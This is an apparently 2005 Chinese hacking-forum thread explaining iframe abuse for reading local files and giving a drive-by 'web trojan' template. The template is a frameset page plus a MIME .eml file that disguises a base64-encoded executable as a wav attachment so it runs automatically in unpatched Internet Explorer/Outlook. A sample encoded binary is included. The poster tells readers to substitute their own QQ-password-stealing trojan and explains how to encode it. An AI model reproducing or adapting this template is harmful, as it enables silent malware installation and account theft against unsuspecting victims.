20CN网络安全小组论坛 - 黑客进阶

论坛: 黑客进阶标题: frame漏洞的应用

作者: hongliubo1 [hongliubo1]

论坛用户

iframe是<html>语句里的一个元素，Iframe标记的使用格式是: 　　<Iframe src="URL" width="x" height="x" scrolling="[OPTION]" frameborder="x"></iframe> 　　src：文件的路径，既可是HTML文件，也可以是文本、ASP等；　　width、height："画中画"区域的宽与高；　　scrolling:当SRC的指定的HTML文件在指定的区域不显不完时，滚动选项，如果设置为NO，则不出现滚动条；如为Auto：则自动出现滚动条；如为Yes，则显示滚动条; 　　FrameBorder：区域边框的宽度，为了让“画中画“与邻近的内容相融合，常设置为0。这样在网页里会显示一个框架,框架的内容就是这个src。问题是我们如果在src=""将引号的内容换成别的文件，那么我们能利用它具体能做什么？ </P><P>1、做网页用呀。干什么？谁扔砖头。将URL换成www.163.com不就是将网易网站变成你网页里一个小窗口了？有画中画效果呢。] </P><P>2、说到重点了，可以读本地文件。假如你女朋友有封情书放成这样c:\情书.txt。电脑又封锁c:，看不到着急呀。写这样一个脚本<IFRAME SRC="file://c:/情书.txt"></IFRAME>然后保存成htm文件运行后不就看到情书了，呀气死了，是写给lcx的。再想一下如果要运行c:/autoexec.bat应当怎样写？ </P><P>3、如果要让这个html文件运行exe文件呢？重点中的重点呀。直接运行src=*.exe是下载呀，不是运行。我弄一个木马，别人不买帐，先要下载才执行，能不能让它直接执行呢？聪明人就想出办法了。将src=*.exe换成src=*.eml就可以了。*.eml是什么东西？是outlook邮件格式的附件呀。微软又有漏洞了。如果eml附件是音乐格式的话就可以直接播放了。换句话说，我们用outlook写一封信，附件里带上那个木马.exe文件，然后另存为*.eml文件，将这个附件的格式换成音乐格式....那不就可以了？
好,我在这儿写一个网页木马模板,你照着修改就可以了.先做一个网页,名为1.htm,源码:
<head>
<title>这是一个演示,请不要害怕!!!</title>
</head>
<frameset>
<frame SRC=s.eml>
</frame>
</frameset>
8:20 2002-11-3</p>
</body>
</html>
网页中的有行代码是src=s.eml,这个eml文件的模板如下:
Content-Type: multipart/related;boundary="1" --1
Content-Type: multipart/alternative;boundary="2" --2
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable</P><P>--1
Content-Type: audio/x-wav;name="hack.exe"
Content-Transfer-Encoding: base64
Content-ID:
TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu MzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAVCsljwAAAAAAAAAA4ACOgQsBAhkA AgAAAAgAAAAAAAAAEAAAABAAAAAgAAAAAEAAABAAAAACAAABAAAAAAAAAAMACgAAAAAAAFAAAAAE AAAAAAAAAgAAAAAAEAAAIAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAADAAAJAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAQAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ09ERQAAAAAA EAAAABAAAAACAAAABgAAAAAAAAAAAAAAAAAAIAAAYERBVEEAAAAAABAAAAAgAAAABAAAAAgAAAAA AAAAAAAAAAAAAEAAAMAuaWRhdGEAAAAQAAAAMAAAAAIAAAAMAAAAAAAAAAAAAAAAAABAAADALnJl bG9jAAAAEAAAAEAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAagBo ACBAAGgbIEAAagDoBwAAAGoA6AYAAAD/JUwwQAD/JVQwQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABXaW5k b3dzIDl4L05UILvjseDKvre2s8zQ8gDV4srH0ru49tfuvPK1pbXEV2luZG93cyA5eC9OVCAzMs67 u+Ox4NPv0dSzzNDytcTUy9DQveG5+w0KseCzzKO6xN+9qLuqICC+tMfrueLB2aO6aHR0cDovL2hv dHNreS4zNjMubmV0DQogICAgICAgICAgICAgICAgICCh76Hvoe+h76HvDQotLS0tLS0tLS0tLS2x 4NLrwbS907e9yr2julRBU00gNS4wLS0tLS0tLS0tLS0tLS0tDQp0YXNtMzIgIC9tbCAgL20yIHRp bnkNCnRsaW5rMzIgL1RwZSAvYWEgdGlueSAsICwgLCAuLlxsaWJcaW1wb3J0MzIubGliDQotLS0t LS0tLS0tLS0tLS0tLdLUz8LKx7PM0PLV/c7ELS0tLS0tLS0tLS0tLS0tLS0tDQogICAgICAgIC41 ODZwDQogICAgICAgIC5tb2RlbCBmbGF0LFNURENBTEwNCmV4dHJuICAgIE1lc3NhZ2VCb3hBOlBS T0MNCmV4dHJuICAgIEV4aXRQcm9jZXNzOlBST0MNCiAgICAgICAgLmRhdGENCnRpdGxlICAgIGRi ICK0sL/aserM4iIsMA0KbWVzc2FnZSAgZGIgIrSwv9rQxc+iIiwwDQogICAgICAgIC5jb2RlDQpi ZWdpbjoNCiAgICAgICAgY2FsbCBNZXNzYWdlQm94QSwwLE9GRlNFVCBtZXNzYWdlLE9GRlNFVCB0 aXRsZSwwDQogICAgICAgIGNhbGwgRXhpdFByb2Nlc3MsMA0KICAgICAgICBlbmRzDQogICAgICAg IGVuZCBiZWdpbgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPDAAAAAA AAAAAAAAXDAAAEwwAABEMAAAAAAAAAAAAABnMAAAVDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdDAA AAAAAACCMAAAAAAAAHQwAAAAAAAAgjAAAAAAAABVU0VSMzIuZGxsAEtFUk5FTDMyLmRsbAAAAE1l c3NhZ2VCb3hBAAAARXhpdFByb2Nlc3MAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAFAAA AAMwCDAcMCIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA </P><P>
你要做的就是修改s.eml模板中的绿色代码.把hack.exe修改为你要盗qq的木马的名字,把下面的编码换成你要盗qq木马的base64编码.如何得到exe文件的base64编码?用outlookexpress就可以.方法这样:outlokkpress-邮件-新邮件-插入-文件附件-找到你的木马文件--文件--另存为--s.eml,然后用记事本打开这个s.eml,找到那些整齐的乱码就可以了,用它来替换我这个eml文件里的乱码就可以了.</P><P>

地主发表时间: 05-01-22 20:26

回复: tabris17 [tabris17]

论坛用户

这好像是很久以前的漏洞了

B1层发表时间: 05-01-23 20:53

回复: 幻影 [baby_love]

论坛用户

关于网页的是新的，outlook这个是MIME的，现在还有没打补丁的OUTLOOK吗？可以试试别的，比如CMD加参数。

B2层发表时间: 05-01-29 23:59

论坛: 黑客进阶